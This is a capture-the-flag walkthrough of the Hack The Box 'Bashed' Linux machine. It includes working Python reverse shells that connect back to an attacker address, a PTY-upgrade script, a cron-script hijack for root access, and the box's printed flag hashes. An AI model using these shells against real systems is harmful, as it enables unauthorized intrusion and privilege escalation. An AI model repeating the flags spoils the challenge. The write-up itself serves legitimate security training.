HTB Bashed Linux
Recon
Nmap scan
Nmap scan report for 10.10.10.68
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /dev/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
| /php/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_ /uploads/: Potentially interesting folder
Dirbuster scan
We browse to the web app on port 80 and quickly notice that it is running phpbash.
Next, we investigate the /dev/ folder listed by http-enum and find two PHP scripts deployed there.
Running phpbash gives us a web shell: it is a backdoor that executes the commands we type on the target machine.
However, this shell is not interactive, so we use netcat to transfer a tcp_pty.py Python script to the target and run it to get a PTY-backed reverse shell that satisfies our needs.
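For reference, here is what such a script has to do, written as an added example (this is not the tcp_pty.py used in the writeup): connect back to the attacker, fork a shell inside a fresh pseudo-terminal with pty.fork(), and shuttle bytes between the socket and the PTY master so the attacker's netcat talks to a real terminal instead of a dumb pipe. ATTACKER_HOST and ATTACKER_PORT are assumed placeholders, and serve_shell() and local_demo() are names chosen for this example; local_demo() plays the listener on loopback, sends the command tty and returns what came back, so the example runs offline and proves the shell really has a terminal.

```python
import os
import pty
import select
import socket

# Added example, not the tcp_pty.py used in the writeup. ATTACKER_HOST and
# ATTACKER_PORT are assumed placeholder values for the attacker's listener.
ATTACKER_HOST = "10.10.14.25"
ATTACKER_PORT = 9999


def serve_shell(host, port, shell="/bin/sh"):
    """Connect back to host:port and bridge the socket to a shell running
    inside a fresh pseudo-terminal, so the remote side gets a real TTY."""
    sock = socket.create_connection((host, port))
    pid, master_fd = pty.fork()          # child: stdin/out/err are the PTY slave
    if pid == 0:
        try:
            os.execv(shell, [shell, "-i"])
        finally:
            os._exit(1)                  # only reached if exec failed
    # Parent: pump bytes socket -> PTY master and PTY master -> socket.
    try:
        while True:
            readable, _, _ = select.select([sock, master_fd], [], [])
            if sock in readable:
                data = sock.recv(4096)
                if not data:             # listener hung up
                    break
                os.write(master_fd, data)
            if master_fd in readable:
                try:
                    data = os.read(master_fd, 4096)
                except OSError:          # EIO on Linux: the shell exited
                    break
                if not data:             # EOF on other platforms
                    break
                sock.sendall(data)
    finally:
        sock.close()
        os.close(master_fd)
        os.waitpid(pid, 0)


def local_demo(command="tty", timeout=15):
    """Offline check: the parent plays the attacker's netcat listener on
    loopback, a forked child plays the target running serve_shell(). Sends
    `command` over the PTY and returns everything the listener received."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # ephemeral port, loopback only
    listener.listen(1)
    listener.settimeout(timeout)
    port = listener.getsockname()[1]
    pid = os.fork()
    if pid == 0:                         # child = the compromised host
        listener.close()
        status = 0
        try:
            serve_shell("127.0.0.1", port)
        except BaseException:
            status = 1
        os._exit(status)
    conn, _ = listener.accept()          # parent = attacker's listener
    listener.close()
    conn.settimeout(timeout)
    conn.sendall(("%s; exit\n" % command).encode())
    received = []
    try:
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            received.append(chunk)
    except socket.timeout:
        pass
    finally:
        conn.close()                     # closing makes serve_shell() tear down
        os.waitpid(pid, 0)
    return b"".join(received).decode(errors="replace")


if __name__ == "__main__":
    # On the target you would call serve_shell(ATTACKER_HOST, ATTACKER_PORT)
    # after starting "nc -lvnp 9999" on the attacker; here we only self-test.
    print(local_demo())
```

On the box the flow is the same as in the writeup: transfer the file with netcat, start the listener on the attacker, and run the script from the phpbash shell; the tty command in the resulting session prints a /dev/pts device instead of "not a tty", which is the difference between the web shell and the upgraded one.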
Exploitation
We run LinEnum and notice that we can run commands as the user scriptmanager through sudo without a password (sudo -l shows the same), so we switch to that user:
sudo -u scriptmanager whoami
sudo -u scriptmanager bash
Privilege Escalation
As scriptmanager we locate a scripts folder containing two interesting files, test.py and test.txt. test.txt is owned by root, while test.py is owned by scriptmanager. test.txt is updated every minute, which indicates a root cron job that runs test.py every minute. Since scriptmanager owns test.py, we replace its contents with the Python reverse shell below, start a netcat listener on 10.10.14.25:9999, and wait for the next run to hand us a root shell:
import socket,subprocess,os
# connect back to the attacker's listener (our VPN address, port 9999)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.25",9999))
# point stdin, stdout and stderr of this process at the socket
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# spawn an interactive shell that inherits those descriptors; run by root's cron job, so the shell is root
p=subprocess.call(["/bin/sh","-i"])
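To make the reasoning behind this step reproducible, here is an added Python example (not part of the writeup) that inspects a directory the way you would inspect the scripts folder: which script files a given user could overwrite, which files were modified in the last couple of minutes (the tell-tale sign of a per-minute cron job), and who owns each file. The permission check is done by hand rather than with os.access(), because os.access() only answers for the calling user and, when run as root, reports almost everything as writable. The directory, file names and the uid values in demo() are constructed test data; writable_by(), find_cron_hijack_candidates() and demo() are names chosen for this example. A root-owned test.txt next to a user-owned test.py cannot be reproduced without root, so demo() exercises the writability and freshness logic and only reports ownership.

```python
import os
import stat
import tempfile
import time

SCRIPT_SUFFIXES = (".py", ".sh", ".pl", ".rb")


def writable_by(st, uid, gids):
    """Unix DAC write check done by hand, so it answers for any uid/gid set.
    os.access() only answers for the calling process and, as root, reports
    'writable' for nearly every file, which hides exactly this finding."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def find_cron_hijack_candidates(directory, uid=None, gids=None, max_age=120):
    """Return (writable_scripts, recently_modified, owners) for one directory.

    writable_scripts:  script files the given user could overwrite
    recently_modified: files touched within max_age seconds (periodic job hint)
    owners:            name -> uid, so a root-owned output file next to a
                       user-owned script stands out (the test.txt / test.py pattern)
    """
    if uid is None:
        uid = os.getuid()
    if gids is None:
        gids = set(os.getgroups()) | {os.getgid()}
    writable, recent, owners = [], [], {}
    now = time.time()
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue                    # skip directories, symlinks, devices
        owners[name] = st.st_uid
        if name.endswith(SCRIPT_SUFFIXES) and writable_by(st, uid, gids):
            writable.append(name)
        if now - st.st_mtime <= max_age:
            recent.append(name)
    return writable, recent, owners


def demo():
    """Constructed stand-in for the scripts folder (test data, not the box's
    files): test.py writable by its owner, test.txt read-only, old.log last
    touched an hour ago. Returns the checker's view as the file owner
    (scriptmanager's position) and as an unrelated user."""
    d = tempfile.mkdtemp()
    for name, content, mode, age in (
        ("test.py", "print('hello')\n", 0o664, 0),
        ("test.txt", "hello\n", 0o444, 0),
        ("old.log", "stale\n", 0o644, 3600),
    ):
        path = os.path.join(d, name)
        with open(path, "w") as f:
            f.write(content)
        os.chmod(path, mode)
        if age:
            old = time.time() - age
            os.utime(path, (old, old))
    me = os.getuid()
    stranger = max(me, os.getgid()) + 1      # a uid/gid that owns nothing here
    as_owner = find_cron_hijack_candidates(d, uid=me, gids={os.getgid()})
    as_stranger = find_cron_hijack_candidates(d, uid=stranger, gids={stranger})
    return as_owner, as_stranger


if __name__ == "__main__":
    owner, stranger = demo()
    print("writable as owner:   ", owner[0])      # ['test.py']
    print("recently modified:   ", owner[1])      # ['test.py', 'test.txt']
    print("writable as stranger:", stranger[0])   # []
```

Run against the real folder on the box as scriptmanager, the same checker would list test.py as writable and test.txt as freshly modified, with owners showing test.txt belonging to uid 0: that combination (a file you can write, executed by a job that produces root-owned output every minute) is what makes the reverse-shell replacement above work.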
FLAGS
ROOT "cc4f0afe3a1026d402ba10329674a8e2"
USER "2c281f318555dbc1b856957c7147bfc1"